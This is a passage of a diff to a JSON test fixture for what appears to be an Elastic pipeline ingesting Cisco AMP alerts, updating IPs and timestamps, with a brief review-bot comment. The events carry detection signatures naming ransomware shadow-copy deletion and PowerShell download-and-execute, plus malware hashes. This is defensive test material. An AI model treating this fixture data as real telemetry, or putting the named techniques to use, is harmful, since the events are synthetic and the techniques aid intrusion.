:\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3311,7 +3311,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3374,7 +3374,7 @@ "c78f4c22dd195a1791472a2c271a0c85b53900d9" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3387,8 +3387,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965574391Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", + "ingested": "2021-12-09T13:35:55.389134900Z", + 
"original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", "code": "1090519105", "kind": "alert", "action": "Malicious Activity Detection", 
@@ -3410,7 +3410,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3462,7 +3462,7 @@ "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3472,8 +3472,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965576447Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", + "ingested": "2021-12-09T13:35:55.389140300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. 
Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:59:30.000Z", @@ -3494,7 +3494,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3549,7 +3549,7 @@ "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
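Review bot: Every regenerated event in this hunk also rewrites `event.ingested` (2021-09-30T00:15:43… → 2021-12-09T13:35:55…) even though the only intended change is `external_ip`, which indicates the pipeline test is not treating that field as dynamic and will keep producing this churn on every regeneration. If the elastic-package version in use supports it, add `dynamic_fields:` / `  event.ingested: ".*"` to the data stream's pipeline test config so the expected file only changes when parser output changes. The move from 8.8.8.8 to 81.2.69.144 itself looks right: 81.2.69.144 is, to my knowledge, one of the addresses carried in the MaxMind test database the GeoIP processor uses under test, so the geo enrichment becomes deterministic and the fixture no longer points at a live third-party resolver address. The enclosing expected-event object starts and ends outside the hunk.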
@@ -3559,8 +3559,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965578513Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", + "ingested": "2021-12-09T13:35:55.389145700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:55:07.000Z", @@ -3581,7 +3581,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3636,7 +3636,7 @@ "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3646,8 +3646,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965580569Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", + "ingested": "2021-12-09T13:35:55.389151Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3668,7 +3668,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3723,7 +3723,7 @@ "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3733,8 +3733,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965582628Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", + "ingested": "2021-12-09T13:35:55.389158400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3755,7 +3755,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3803,7 +3803,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3813,8 +3813,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965584650Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.389163900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -3834,7 +3834,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3879,7 +3879,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3889,8 +3889,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965586713Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.389168400Z", + "original": 